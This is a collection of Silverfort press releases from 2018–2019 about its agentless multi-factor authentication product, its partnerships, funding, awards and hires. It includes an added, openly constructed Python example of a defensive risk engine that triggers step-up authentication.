Silverfort allows organizations to prevent data breaches and achieve compliance instantly, by preventing identity-based attacks across complex, dynamic networks, including hybrid and multi-cloud environments.

Media Contact:
Dan Chmielewski
Madison Alexander PR
714-832-8716
949-231-2965
dchm@madisonalexanderpr.com

---

- Published: 2019-03-26
- Modified: 2024-06-05
- URL: https://www.silverfort.com/press-news/silverfort-and-okta-partner-to-enable-secure-authentication-for-unprotectable-systems/

The new partnership will allow joint customers to seamlessly extend Okta Adaptive Multi-Factor Authentication to any sensitive system, and securely migrate sensitive servers and applications to the cloud.

BOSTON, MA and Tel Aviv, Israel March 27, 2019 — Silverfort, the provider of Next-Generation Authentication solutions, today announces a new partnership with Okta, the leading independent provider of identity for the enterprise. By integrating Okta Multi-Factor Authentication (MFA) with Silverfort’s agentless authentication platform, joint customers will be able to extend secure authentication to any sensitive system in any environment, and securely migrate sensitive on-premises assets to the cloud, without requiring software agents or proxies.

Seamlessly Extending MFA to Any Resource, Including ‘Unprotectable’ Systems

Today, MFA and adaptive authentication are available only for specific types of resources, such as SaaS applications and VPN gateways. Silverfort introduces a next-generation risk based authentication platform which enables secure authentication for any system, including systems that were considered “unprotectable” until today, without any modifications to endpoints and servers. This includes homegrown applications, IT infrastructure, IoT devices, dynamic IaaS environments and more.
By integrating with Okta, joint customers will be able to seamlessly extend Okta MFA to any sensitive system and address a wide variety of security use cases and regulatory compliance needs, without having to enroll users with a new MFA product.

“Okta and Silverfort bring together a powerful and unique solution that addresses one of the fastest growing security challenges in today’s enterprises,” says Hed Kovetz, CEO and Co-Founder of Silverfort. “Cloud, IoT and personal devices are changing our enterprise networks and erasing their perimeters. In this new reality, users must be authenticated before allowing them to access any sensitive resource, whether within the corporate network or in the cloud. We are proud to partner with Okta and excited to introduce the first end-to-end authentication solution that covers all users, devices and systems.”

Enable Secure Cloud Migration of Sensitive Servers and Applications

By enabling secure authentication for sensitive assets that cannot be protected today, such as homegrown, legacy and proprietary systems, Silverfort and Okta allow organizations to migrate them to the cloud without worrying about unauthorized access. Today, many companies are reluctant to move their sensitive workloads to the cloud unless they can ensure that no one else can access them. By seamlessly enabling MFA and adaptive authentication for any system, including those that don’t support it today, Silverfort and Okta eliminate this barrier.

“Enterprises are managing an increasingly broad spectrum of endpoints, with access management serving as one of the most effective ways to connect users with the technology they need while simultaneously securing an organization’s most valuable resources,” said Chuck Fontana, Vice President of Integrations and Strategic Partnerships at Okta.
“As the technology landscape continues to evolve, it will be imperative for organizations to continue to adapt their multi-factor authentication capabilities, and we’re excited to work with Silverfort to meet that important security and user experience need.”

Silverfort will be demonstrating the joint solution at Oktane 2019, April 1-4, Moscone West, San Francisco. Schedule a demo

About Silverfort

Silverfort delivers strong authentication across corporate networks and cloud environments, without deploying any software agents or inline proxies. Using patent-pending technology, Silverfort enables adaptive multi-factor authentication for all sensitive users, devices and resources, including systems that don’t support it today, such as IoT devices, critical infrastructure, file systems and more. Silverfort allows organizations to prevent data breaches and achieve compliance instantly, by preventing identity-based attacks across complex, dynamic networks, including hybrid and multi-cloud environments.

Media Contact: Dan Chmielewski, Madison Alexander PR, 714-832-8716 / 949-231-2965, dchm@madisonalexanderpr.com

---

- Published: 2019-03-03
- Modified: 2024-06-05
- URL: https://www.silverfort.com/press-news/silverfort-named-winner-of-most-innovative-adaptive-authentication-infosec-award-for-2019-by-cyber-defense-magazine/

Silverfort Named Winner of Most Innovative...

A Demo of Silverfort’s Next-Generation Authentication Platform Will Be Shown This Week During the RSA Conference 2019 at South Hall Booth #1641

BOSTON, MA and Tel Aviv, Israel, March 5, 2019 — Silverfort, the provider of next-generation authentication solutions, today announced that the Silverfort Next-Generation Authentication Platform received the Most Innovative Adaptive Risk-Based Authentication InfoSec Award for 2019 by Cyber Defense Magazine.
Corporate networks have been going through dramatic changes in the past few years, due to IT revolutions such as the cloud, Internet of Things (IoT) and Bring Your Own Device (BYOD) that are creating new cybersecurity challenges. With countless devices and services, on-premises and in the cloud, and the dissolving network perimeters, traditional authentication solutions become irrelevant, and a new approach is needed. Silverfort seamlessly delivers secure authentication across all those systems and environments without requiring any agents or proxies. Thanks to its agentless architecture, it then continuously analyzes the behavior of all users and devices with an AI-driven risk engine, triggering step-up authentication and blocking threats in real time without disrupting legitimate users.

“Silverfort has won the Most Innovative Adaptive Risk-Based Authentication InfoSec Award from our magazine because they are an innovator that might actually help you reach this goal and defeat the next generation of identity-based attacks,” said Gary S. Miliefsky, CEO, Cyber Defense Media Group, which is in its 7th year of publishing Cyber Defense Magazine and running these independent and prestigious awards.

“We are honored to be recognized by Cyber Defense Magazine for our achievements in building the next generation of secure authentication solutions, that enable organizations to seamlessly protect any sensitive system, across distributed environments, and prevent unauthorized access as well as identity-based attacks in real time,” said Hed Kovetz, CEO and Co-founder of Silverfort. “Silverfort is committed to solving the challenges our customers are facing by continuing to offer innovative, user-friendly solutions.”

See a demo of @Silverfort Next-Generation Authentication platform at booth #1641 in the South Hall at the #RSAC in San Francisco this week.
About Silverfort

Silverfort delivers strong authentication across entire corporate networks and cloud environments, without deploying any software agents or inline proxies. Using patent-pending technology, Silverfort enables adaptive multi-factor authentication for all sensitive users, devices and resources, including systems that don’t support it today, such as IoT devices, critical infrastructure, file systems and more. Silverfort allows organizations to prevent data breaches and achieve compliance instantly, by preventing identity-based attacks even across complex, dynamic networks, including hybrid and multi-cloud environments. The company has received worldwide recognition and several industry awards, including the InfoSecurity 2018 Global Excellence Awards for Best Authentication Product and Best User and Entity Behavior Analytics Product, the Frost & Sullivan 2017 New Product Innovation Award, and is a gold winner of the Cybersecurity Excellence Awards in the Multi-Factor Authentication category. Contact us to learn more.

About CDM InfoSec Awards

This is Cyber Defense Magazine’s seventh year of honoring InfoSec innovators. Our submission requirements are for any startup, early stage, later stage or public companies in the INFORMATION SECURITY (INFOSEC) space who believe they have a unique and compelling value proposition for their product or service. Learn more at www.cyberdefenseawards.com

About the Judging

The judges are CISSP, FMDHS, CEH certified security professionals who voted based on their independent review of the company-submitted materials on the website of each submission, including but not limited to data sheets, white papers, product literature and other market variables. CDM has a flexible philosophy to find more innovative players with new and unique technologies, than the one with the most customers or money in the bank. CDM is always asking “What’s Next?” so we are looking for Next Generation InfoSec Solutions.
About Cyber Defense Magazine

With over 1.4 Million annual readers and growing, and over 7,000 pages of searchable online infosec content, Cyber Defense Magazine is the premier source of IT Security information. We are managed and published by and for ethical, honest, passionate information security professionals. Our mission is to share cutting-edge knowledge, real-world stories and awards on the best ideas, products and services in the information technology industry. We deliver electronic magazines every month online for free, and limited print editions exclusively for the RSA conferences and our paid subscribers. CDM is a proud member of the Cyber Defense Media Group. Learn more about us at http://www.cyberdefensemagazine.com and visit http://www.cyberdefensetv.com and http://www.cyberdefenseradio.com to see and hear some of the most informative interviews of many of these winning company executives.

Media Contact: Dan Chmielewski, Madison Alexander PR, 714-832-8716 / 949-231-2965, dchm@madisonalexanderpr.com

---

- Published: 2019-02-20
- Modified: 2024-06-05
- URL: https://www.silverfort.com/press-news/silverfort-achieves-microsoft-co-sell-status/

Co-sell partnership to provide unparalleled access to Microsoft’s Enterprise customers. Silverfort offers the first next-generation authentication platform, enabling enterprises to migrate sensitive assets securely to the cloud.

BOSTON, MA and Tel Aviv, Israel, Feb 20, 2019 — Silverfort joins a specialised group of high-growth startups, earning co-sell status as part of Microsoft’s new programme to collaborate on intensive joint sales and go-to-market initiatives. The company will partner with Microsoft sales teams to enable enterprises to deliver adaptive authentication to any sensitive system, including homegrown applications and IoT, without requiring any agents or proxies and without any integration with individual systems.
This allows enterprises to securely migrate their systems to the Azure cloud infrastructure, including homegrown and proprietary systems that were left on-premise because they couldn’t be protected from unauthorized access with secure authentication.

Hed Kovetz, CEO of Silverfort said: “We’re thrilled that we have achieved co-sell status. Landing the co-sell partnership with Microsoft allows Silverfort to deliver next-generation authentication to Microsoft customers and partners around the world, protect authentication to sensitive assets they could not protect until today and enable secure migration of proprietary systems to Azure.”

Silverfort’s ground-breaking platform uses an AI-driven risk engine to continuously analyze risk and trust levels, enabling customers to enforce accurate and holistic adaptive authentication policies. It helps organizations secure access to any sensitive system both on-premise and in the cloud, prevent data breaches and comply with data security regulations like PCI-DSS, GDPR, HIPAA, NY-DFS and others.

Charlotte Yarkoni, Microsoft’s Corporate VP, Growth and Ecosystems, commented at the February 2018 launch of Microsoft for Startups: “We are committing $500 million over the next two years to offer joint sales engagements with startups, along with access to our technology... Microsoft is partnering with founders and investors to help propel their growth.”

Warwick Hill, Senior MD Microsoft for Startups Europe & Middle East, added: “Over the last few years, corporate networks have gone through dramatic changes due to IT revolutions such as cloud, IoT and BYOD. This calls for a new approach to authentication, that will protect those countless assets from unauthorized access. We are excited to join hands with Silverfort to bring its agentless authentication platform to Microsoft’s enterprise customers.”

About Silverfort

Silverfort delivers strong authentication across corporate networks and cloud environments, without deploying any software agents or inline proxies. Using patent-pending technology, Silverfort enables adaptive multi-factor authentication for all sensitive users, devices and resources, including systems that don’t support it today, such as IoT devices, critical infrastructure, file systems and more. Silverfort allows organizations to prevent data breaches and achieve compliance instantly, by preventing identity-based attacks across complex, dynamic networks, including hybrid and multi-cloud environments.

Media Contact: Dan Chmielewski, Madison Alexander PR, 714-832-8716 / 949-231-2965, dchm@madisonalexanderpr.com

---

- Published: 2019-02-06
- Modified: 2024-06-05
- URL: https://www.silverfort.com/press-news/industry-veteran-alan-cohen-joins-silverfort-as-strategic-advisor/

Cohen to advise on the company’s vision and scaling operations to meet growing demand for its agentless authentication platform

BOSTON, MA and Tel Aviv, Israel, Feb 6, 2019 — Silverfort, the provider of next-generation authentication solutions, today announced that Alan Cohen has joined as a strategic advisor. A former senior executive at leading technology companies such as Illumio, Nicira and Cisco, Cohen has had a successful 25-year career at cloud software, networking and security companies as a hands-on executive and board member, generating revenue of more than $6 billion. He is a frequent industry speaker and commentator whose work appears regularly in The New York Times, Forbes, Fortune, Recode, ReadWrite, and Pando Daily.

Silverfort’s non-intrusive MFA platform enables organizations to secure access to any sensitive resource, including systems that couldn’t be protected until today, without requiring agents, proxies or local configurations.
Using innovative technology, Silverfort can help enterprises transition into modern IAM frameworks including adoption of AI-based adaptive authentication, zero-trust security and passwordless authentication, without having to change their existing systems and networks, which is often a significant barrier.

“Silverfort’s groundbreaking technology solves a big security gap for many organizations - a gap that is only growing bigger as network perimeters continue to dissolve,” says Cohen. “I’m excited to join this talented team and help them bring this solution to the market.”

“Alan's successful track record, vast experience and industry influence are a tremendous addition to our team,” says Hed Kovetz, CEO of Silverfort. “We are truly lucky to have access to Alan’s experience and mentorship as we continue to expand our market presence through strategic partnerships and accelerate the company’s growth.”

“Protecting the Unprotectable” with Next-Generation Authentication

As network perimeters continue to disappear due to cloud migration, IoT, Bring-Your-Own-Device policies and more, current MFA solutions are becoming ineffective and cannot handle the diversity, complexity and dynamic nature of the new corporate environment. Silverfort enables companies to seamlessly deliver strong authentication across all sensitive assets both on-premises and in the cloud, without requiring any agents or proxies, and to leverage AI-driven adaptive authentication policies across all systems and environments.

Silverfort’s agentless architecture and holistic approach offer a big advantage over mainstream MFA solutions as they enable organizations to extend protection to any sensitive system or resource, including systems that were considered “unprotectable” until today, such as homegrown and proprietary business applications, regulated systems and data (e.g. financial, healthcare), IT infrastructure (e.g. hypervisors, DCs and network equipment), administrative access (e.g. PAM, RDP, SSH), file shares, databases, SCADA, IoT devices and more. By enabling strong authentication to proprietary systems and applications, Silverfort also helps companies migrate them securely and easily to the cloud.

Silverfort monitors all access requests across on-premises and cloud environments, continuously calculating risk levels and applying adaptive authentication policies to step up authentication and block threats in real time. This allows organizations to maximize security while minimizing disruptions to legitimate users.

About Silverfort

Silverfort delivers strong authentication across entire corporate networks and cloud environments, without deploying any software agents or inline proxies. Using patent-pending technology, Silverfort enables adaptive multi-factor authentication for all sensitive users, devices and resources, including systems that don’t support it today, such as IoT devices, critical infrastructure, file systems and more. Silverfort allows organizations to prevent data breaches and achieve compliance instantly, by preventing identity-based attacks even across complex, dynamic networks, including hybrid and multi-cloud environments. The company has received worldwide recognition and several industry awards, including the InfoSecurity 2018 Global Excellence Awards for Best Authentication Product and Best User and Entity Behavior Analytics Product, the Frost & Sullivan 2017 New Product Innovation Award, and is a gold winner of the Cybersecurity Excellence Awards in the Multi-Factor Authentication category. Contact us to learn more.

Media Contact: Dan Chmielewski, Madison Alexander PR, 714-832-8716 / 949-231-2965, dchm@madisonalexanderpr.com

---

- Published: 2018-11-27
- Modified: 2024-06-05
- URL: https://www.silverfort.com/press-news/silverfort-launches-first-holistic-ai-driven-adaptive-authentication/
The agentless solution analyzes user behavior across all corporate devices, resources and environments, to enable risk-based authentication policies with unparalleled coverage and accuracy.

BOSTON, Oct 23, 2018 — Silverfort, the provider of next-generation multi-factor authentication solutions, today announced a first-of-its-kind AI-based risk engine that analyzes activities across all on-premises and cloud environments, to dynamically calculate the most accurate risk score per user, device and resource, and apply effective authentication policies.

Most Multi-Factor Authentication (MFA) solutions were designed as point solutions for specific systems or for certain types of assets (e.g. web applications). As such, the risk analysis and adaptive authentication policies they can offer are limited to the specific systems they protect. They are incapable of protecting the wide variety of endpoints, applications, servers, legacy systems, infrastructure, data, cloud resources and IoT devices that exist in today’s organizations.

A Holistic Approach Provides Accurate Risk Analysis

Unlike these point solutions, Silverfort’s approach is fundamentally different. Silverfort looks at authentication at the network level instead of integrating MFA into each individual asset. This holistic approach enables unified authentication policies, visibility, user experience and risk analysis across all systems and environments. Silverfort’s agentless architecture and holistic approach offer a big advantage over other solutions as they enable unparalleled visibility into all user activities, across all systems and environments, continuously analyzing risk for every authentication request with unmatched accuracy.

“Monitoring all authentication activities in one centralized platform allows Silverfort to analyze more data than any other authentication solution — typically hundreds of authentication requests per user per day,” explains Hed Kovetz, CEO and Co-Founder of Silverfort.
“This provides a far more accurate risk score and enables adaptive policies that are less disruptive yet more effective.”

Continuously Assessing Risk with Silverfort’s AI-Based Risk Engine

Silverfort’s risk engine combines 3 core components that continuously analyze risk based on authentication activities in real time to detect a wide range of malicious behaviors and threats.

To learn more about Silverfort’s Adaptive Authentication, download the White Paper.

Silverfort’s Risk Engine combines the following core components:

- Anomaly Detection: Identifies deviations from normal activities based on a rich behavioral profile of each user and device.
- Recognition of Known Malicious Patterns: Automatically recognizes patterns of brute force attacks, lateral movement, ransomware and more.
- Threat indications from 3rd party security solutions: Instantly steps up the authentication requirements in response to threat alerts from third party solutions.

The combination of these components results in the most accurate risk score and enables adaptive policies that are less disruptive yet more effective.

Meet Silverfort at Gartner Identity and Access Management Summit 2018

Visit Silverfort and watch a demo of the Next-Gen Authentication Platform at booth #611 at the Expo Hall, Monday, Dec 3rd through Wednesday, Dec 5th. To schedule a meeting please click here.

About Silverfort

Silverfort delivers strong authentication across entire corporate networks and cloud environments, without deploying any software agents or inline proxies. Using patent-pending technology, Silverfort enables adaptive multi-factor authentication for all sensitive users, devices and resources, including systems that don’t support it today, such as IoT devices, critical infrastructure, file systems and more. Silverfort allows organizations to prevent data breaches and achieve compliance instantly, by preventing identity-based attacks even across complex, dynamic networks, including hybrid and multi-cloud environments.
The company has received worldwide recognition and several industry awards, including the InfoSecurity 2018 Global Excellence Awards for Best Authentication Product and Best User and Entity Behavior Analytics Product, the Frost & Sullivan 2017 New Product Innovation Award, and is a gold winner of the Cybersecurity Excellence Awards in the Multi Factor Authentication category. Contact us to learn more - silverfortcnt.wpengine.com/contact

Media Contact: Dan Chmielewski, Madison Alexander PR, 714-832-8716 / 949-231-2965, dchm@madisonalexanderpr.com

---

- Published: 2018-11-13
- Modified: 2024-06-05
- URL: https://www.silverfort.com/press-news/silverfort-partners-with-check-point-to-deliver-threat-driven-mfa/

The joint solution enables real-time step-up authentication response to detected threats

BOSTON, Oct 23, 2018 — Silverfort, the provider of next-generation multi-factor authentication solutions, today announced that it has partnered with Check Point Software Technologies Ltd. to enable customers to respond to detected threats in real time by stepping up authentication. The joint solution enables unparalleled risk-based adaptive authentication throughout the organization.

One of the top challenges for security teams trying to respond to detected threats is the amount of false positive alerts. With this integration, customers can leverage Silverfort’s adaptive authentication platform to trigger step-up authentication in response to any Check Point detected threats in real time and eliminate false positives. For example, if Check Point detects bot activity from a specific host, Silverfort can automatically require an additional form of authentication for any attempt to access resources performed by the suspect host. If the additional authentication fails, the activity will be blocked.
“The threat landscape is evolving faster than ever before, requiring security practitioners to swiftly and concisely respond to detected threats,” says Snir Hassidim, Business and Corporate Development Manager at Check Point Software Technologies. “This partnership with Silverfort will improve our customers’ ability to respond to these threats, by stepping up the authentication requirements to seamlessly improve validation of user identities.”

Download the joint solution brief

Enabling Real-Time Incident Response with Dynamic Policies

Network security solutions provide a binary approach to threat prevention: when detecting a threat, they either block the user, or allow access and raise an alert. By combining the two solutions, our customers can leverage dynamic step-up authentication as a response to network security events. When Check Point identifies a compromised user or device, it sends an alert to Silverfort, which responds by dynamically stepping up the authentication requirements, demanding the user to use an additional form of authentication and confirm his/her identity.

Dynamically stepping up the authentication criteria instead of simply rejecting the transaction improves real-time incident response, allowing organizations to respond with effective security measures upon suspicious activity. It is also less disruptive than automatic blocking of user access, because it enables the user to quickly confirm his/her identity and continue without unnecessary disruptions to the business.

Improving Detection of Malicious Activity with High-Fidelity Alerts

Today, security professionals need to deal with a high volume of security alerts. Detecting internal malicious activity, like lateral movement, becomes very difficult because a skilled attacker knows how to blend in with normal user activity. Distinguishing between false positives and real malicious incidents is nearly impossible.
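The two releases above describe the same control from two sides: a risk engine that sums anomaly detection, known-malicious-pattern matching and third-party threat indications into one score, and a threat-driven policy that answers a network alert with step-up authentication rather than an outright block, feeding the outcome back to the alert source. The following is an added illustrative model of that flow written for this page; it is not Silverfort’s or Check Point’s code, and every class, weight, threshold, user, host and alert in it is constructed.

```python
from dataclasses import dataclass, field
from enum import Enum


class Decision(Enum):
    ALLOW = "allow"
    STEP_UP = "step-up"   # demand an additional authentication factor
    BLOCK = "block"


@dataclass
class AuthRequest:
    user: str
    host: str
    resource: str
    hour: int                 # hour of day (0-23) the request was seen
    failed_attempts: int = 0  # recent failed logins for this user from this host


@dataclass
class RiskEngine:
    """Toy risk engine (constructed for this example): three component scores
    are summed into one risk score, and a policy maps the score to a decision."""
    baseline: dict                                   # user -> {"hosts", "hours", "resources"}
    flagged_hosts: set = field(default_factory=set)  # hosts named in third-party alerts
    feedback: list = field(default_factory=list)     # outcomes returned to the alert source

    # Component 1: deviation from the user's behavioural profile.
    def anomaly_score(self, req: AuthRequest) -> float:
        profile = self.baseline.get(req.user, {})
        score = 0.0
        if req.host not in profile.get("hosts", set()):
            score += 0.3
        if req.hour not in profile.get("hours", set()):
            score += 0.2
        if req.resource not in profile.get("resources", set()):
            score += 0.2
        return score

    # Component 2: a known malicious pattern (only brute force is modelled here).
    def known_pattern_score(self, req: AuthRequest) -> float:
        return 0.6 if req.failed_attempts >= 5 else 0.0

    # Component 3: threat indication from a third-party security product.
    def third_party_score(self, req: AuthRequest) -> float:
        return 0.7 if req.host in self.flagged_hosts else 0.0

    def risk_score(self, req: AuthRequest) -> float:
        total = (self.anomaly_score(req) + self.known_pattern_score(req)
                 + self.third_party_score(req))
        return min(1.0, total)

    def decide(self, req: AuthRequest) -> Decision:
        score = self.risk_score(req)
        if score >= 0.9:
            return Decision.BLOCK
        if score >= 0.3:
            return Decision.STEP_UP
        return Decision.ALLOW

    def ingest_alert(self, alert: dict) -> None:
        """A third-party alert about a host raises the authentication bar for
        that host instead of cutting it off outright."""
        if alert.get("type") == "bot_activity":
            self.flagged_hosts.add(alert["host"])

    def enforce(self, req: AuthRequest, mfa_verifier) -> Decision:
        """Apply the policy; on STEP_UP ask for another factor and block if it
        fails. The outcome is recorded as feedback for the alert source."""
        decision = self.decide(req)
        if decision is Decision.STEP_UP:
            passed = mfa_verifier(req.user)
            decision = Decision.ALLOW if passed else Decision.BLOCK
            if req.host in self.flagged_hosts:
                self.feedback.append(
                    (req.host, "likely false positive" if passed else "confirmed"))
        return decision


def build_demo_engine() -> RiskEngine:
    # Constructed baseline: alice works from ws-alice, 09:00-17:59, on the file share.
    return RiskEngine(baseline={"alice": {"hosts": {"ws-alice"},
                                          "hours": set(range(9, 18)),
                                          "resources": {"fileshare"}}})


def run_demo() -> dict:
    engine = build_demo_engine()
    normal = AuthRequest("alice", "ws-alice", "fileshare", hour=10)
    results = {"normal": engine.enforce(normal, lambda u: True)}

    # Constructed sensor alert: bot activity seen on alice's workstation.
    engine.ingest_alert({"type": "bot_activity", "host": "ws-alice"})
    results["flagged_before_mfa"] = engine.decide(normal)
    results["flagged_mfa_ok"] = engine.enforce(normal, lambda u: True)
    results["flagged_mfa_fail"] = engine.enforce(normal, lambda u: False)

    # Unknown host, odd hour, unusual resource and a burst of failures: blocked outright.
    brute = AuthRequest("alice", "kiosk-7", "db", hour=3, failed_attempts=6)
    results["brute_force"] = engine.enforce(brute, lambda u: True)
    results["feedback"] = list(engine.feedback)
    return results


if __name__ == "__main__":
    for name, value in run_demo().items():
        print(f"{name}: {value}")
```

The point to notice is the middle band of the policy: the flagged workstation is neither trusted nor dropped, it is challenged, and whether the challenge succeeds is what turns the sensor's alert into either a suppressed false positive or a confirmed incident. Weights and thresholds are placeholders; in a real deployment they would be tuned against the organization's own authentication history.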
“Corporate networks have dramatically changed in recent years creating new security challenges. Perimeters no longer exist, and passwords are no longer enough to validate and trust our users,” says Hed Kovetz, CEO of Silverfort. “By integrating Silverfort’s adaptive authentication with Check Point we enable our customers to trigger step-up authentication based on real-time security alerts, and achieve real-time prevention without reducing the productivity of their legitimate users.”

About Silverfort

Silverfort delivers strong authentication across entire corporate networks and cloud environments, without any modifications to endpoints and servers. Using patent-pending technology, Silverfort enables adaptive multi-factor authentication for all sensitive users, devices and resources, including systems that don’t support it today, such as IoT devices, critical infrastructure, file systems and more. Silverfort allows organizations to prevent data breaches and achieve compliance instantly, by preventing identity-based attacks even across complex, dynamic networks, including hybrid and multi-cloud environments. The company has received worldwide recognition and several industry awards, including the InfoSecurity 2018 Global Excellence Awards for Best Authentication Product and Best User and Entity Behavior Analytics Product, the Frost & Sullivan 2017 New Product Innovation Award, and is a gold winner of the Cybersecurity Excellence Awards in the Multi Factor Authentication category. Contact us to learn more - silverfort.com/contact

Media Contact: Dan Chmielewski, Madison Alexander PR, 714-832-8716 / 949-231-2965, dchm@madisonalexanderpr.com

---

- Published: 2018-10-08
- Modified: 2024-06-05
- URL: https://www.silverfort.com/press-news/silverfort-next-gen-authentication-app-now-available-on-the-palo-alto-networks-application-framework/
Boston, MA and Tel Aviv, Israel, October 8th 2018 — Silverfort today announced the availability of the Silverfort Next Generation Authentication App for the Palo Alto Networks® Application Framework. The Application Framework is a cloud-based framework that extends the capabilities of the Palo Alto Networks Security Operating Platform, allowing organizations to rapidly consume and implement a variety of innovative security apps from any provider, large or small.

Silverfort enables organizations to add risk-based adaptive authentication to any system or resource, across entire networks and cloud environments, without deploying any software agents, costly integrations or reducing productivity. Silverfort’s non-intrusive solution can protect systems that don’t support multi-factor authentication today, such as proprietary systems, IoT devices, shared files and folders, industrial control systems (ICS) and more. This allows organizations to secure corporate identities and critical assets, prevent data breaches and achieve compliance with regulations like GDPR, PCI and HIPAA.

By combining the powerful threat detection and prevention capabilities of Palo Alto Networks with Silverfort’s agentless authentication technology, this new app automatically enforces step-up authentication for suspicious users, based on real-time alerts from the Application Framework. When alerts are received, Silverfort provides suspected users a chance to prove their identity and continue to work, while effectively blocking malicious entities.
The authentication results are provided as feedback to the Application Framework, allowing security teams to focus on actual threats and reduce false positives.

Watch A Live Demo of Silverfort Next-Gen Authentication Platform with the Palo Alto Networks Application Framework and Visit Silverfort at Ignite '18 Europe Cybersecurity Conference, October 8-10, 2018, RAI Exhibition and Convention Center, Amsterdam

QUOTES

“We are excited to offer our mutual customers the ability to leverage the Silverfort Platform capabilities as part of the Palo Alto Networks Application Framework, making adaptive authentication smarter and more holistic than ever. By triggering step-up authentication and validating the user’s identity in response to network threats, Silverfort’s app helps companies achieve real-time threat prevention, while reducing productivity disruptions and minimizing false positive alerts. This joint offering enables continuous adaptive authentication with better accuracy and broader coverage, allowing organizations to deliver strong authentication across their entire networks.” - Hed Kovetz, CEO and Co-Founder, Silverfort

“We are thrilled to see the debut of third-party applications for our customers, and we welcome Silverfort to the Application Framework developer community. Together, we are fueling innovation in the cybersecurity market by completely changing the way that organizations test, deploy, and manage security. This important advancement will make organizations everywhere more secure and help protect our way of life in the digital age.” - Lee Klarich, chief product officer, Palo Alto Networks

AVAILABILITY

The Silverfort Next-Gen Authentication Platform and App are available worldwide to customers, either from the Palo Alto Networks Application Framework or directly from Silverfort. The Palo Alto Networks Application Framework is now available worldwide to customers.
About Silverfort

Silverfort delivers strong authentication across entire corporate networks and cloud environments, without any modifications to endpoints and servers. Using patent-pending technology, Silverfort enables adaptive multi-factor authentication for all sensitive users, devices and resources, including systems that don’t support it today, such as IoT devices, critical infrastructure, file systems and more. Silverfort allows organizations to prevent data breaches and achieve compliance instantly, by preventing identity-based attacks even across complex, dynamic networks, including hybrid and multi-cloud environments. The company has received world-wide recognition and several industry awards, including the InfoSecurity 2018 Global Excellence Awards for Best Authentication Product and Best User and Entity Behavior Analytics Product, the Frost & Sullivan 2017 New Product Innovation Award, and is a gold winner of the Cybersecurity Excellence Awards in the Multi Factor Authentication category. To learn more visit our recognition section.

---

- Published: 2018-09-05
- Modified: 2024-06-05
- URL: https://www.silverfort.com/press-news/silverfort-expands-executive-leadership-team-drive-accelerated-growth-innovation/

Next Generation Authentication Leader Onboards Executives to Scale Operations and Meet Growing Demand

Boston, MA and Tel Aviv, Israel — September 5, 2018 — Silverfort, the provider of next-generation authentication solutions, today announced the appointment of top executives and industry experts who will help the company accelerate its growth and meet growing demand for its revolutionary authentication solution. Following its recent series A funding, Silverfort has appointed Dana Tamir as Vice President, Market Strategy, Ron Rasin as Vice President, Product Management, Amir Boldo as Vice President, Engineering, and Rotem Zach as Vice President, Research.
“Corporate networks have dramatically changed in recent years, creating new security challenges,” says Hed Kovetz, Silverfort’s CEO. “In order to protect our sensitive data and assets from unauthorized access, we must reinvent the way authentication and trust are implemented in our networks. We are redefining this space with a holistic approach which calls for an outstanding team. Dana, Ron, Amir and Rotem have the right industry experience and leadership to do just that.”

Dana Tamir brings over two decades of go-to-market excellence with a successful track record combining deep technical understanding with market vision and hands-on experience bringing new solutions to market. Prior to joining Silverfort, Dana was Vice President, Marketing at Indegy. She also held a number of leadership roles at prominent cyber security companies including IBM Trusteer, Imperva, Symantec and Amdocs.

Ron Rasin brings over a decade of hands-on product management experience and cyber security expertise. Prior to joining Silverfort, Ron was Director of Product Management at Claroty, and held product management roles at Wix and NCR. Ron served as a Team Leader at the 8200 elite cyber unit of the Israel Defense Forces and holds a B.A. in Economics from Tel Aviv University.

Amir Boldo joined Silverfort to lead its exceptional engineering team. He brings more than 15 years of industry experience and technology leadership. Prior to joining Silverfort, Amir served as Vice President, Innovation at DRIVENETS, where he led the development of cutting-edge cloud-based network products. He was also one of the first team members at Zerto, and led one of its core R&D teams. Amir served at the 8200 elite cyber unit of the Israel Defense Forces and received the unit’s excellence award.

Rotem Zach was promoted to lead Silverfort’s research team, which tackles some of the most complex challenges in cybersecurity, cryptography and big data analytics.
He joined Silverfort as one of the first employees, after many years of research and leadership roles at the 8200 elite cyber unit of the Israel Defense Forces.

Silverfort was founded in 2016 and recently raised $11.5 Million to deliver the next generation of authentication solutions. Already, customer and industry response has been very positive to Silverfort’s unique authentication platform, which enables adaptive multi-factor authentication across entire networks and cloud environments, and can protect all resources including those considered unprotectable until today. These executive additions will continue the forward momentum of the company.

### About Silverfort

Silverfort delivers strong authentication across entire corporate networks and cloud environments, without any modifications to endpoints and servers. Using patent-pending technology, Silverfort enables adaptive multi-factor authentication for all sensitive users, devices and resources, including systems that don’t support it today, such as IoT devices, critical infrastructure, file systems and more. Silverfort allows organizations to prevent data breaches and achieve compliance instantly, by preventing identity-based attacks even across complex, dynamic networks, including hybrid and multi-cloud environments. The company has received world-wide recognition and several industry awards, including the InfoSecurity 2018 Global Excellence Awards for Best Authentication Product and Best User and Entity Behavior Analytics Product, the Frost & Sullivan 2017 New Product Innovation Award, and is a gold winner of the Cybersecurity Excellence Awards in the Multi Factor Authentication category. To learn more visit silverfortcnt.wpengine.com

Contact: Dan Chmielewski, Madison Alexander PR, 714-832-8716, 949-231-2965

---

- Published: 2018-06-25
- Modified: 2024-06-05
- URL: https://www.silverfort.com/press-news/silverfort-raises-11-5-million-series-enable-multi-factor-authentication-without-integration/

### Silverfort Raises $11.5 Million in Series A to Deliver the Next Generation of Multi-Factor Authentication

Silverfort’s revolutionary authentication platform delivers adaptive multi-factor authentication across entire enterprise networks and cloud environments without any modifications to endpoints and servers.

Tel-Aviv, Israel and Boston, MA — June 25, 2018 — Silverfort, the first agentless multi-factor authentication provider, announced today an $11.5 million Series A round. The new funding was led by TLV Partners, with participation from the company’s early investors StageOne Ventures and Singtel Innov8. Silverfort will use the funds to address growing demand for its innovative authentication platform, which enables adaptive multi-factor authentication for sensitive assets without integration or loss of productivity. The company has customers across the financial, healthcare, energy, legal and technology industries, and has formed strategic partnerships with top security vendors.

Silverfort offers a unique authentication platform which seamlessly delivers adaptive multi-factor authentication across entire networks and cloud environments. This includes even systems that don’t support multi-factor authentication today, such as proprietary systems, IoT devices, shared files and folders, industrial control systems (ICS) and more. Silverfort’s patent-pending technology is non-intrusive and does not require deployment of software agents or inline gateways.
It allows companies to secure corporate identities and critical assets, prevent data breaches and achieve compliance with regulations like GDPR, PCI and HIPAA without costly integration and without reducing productivity.

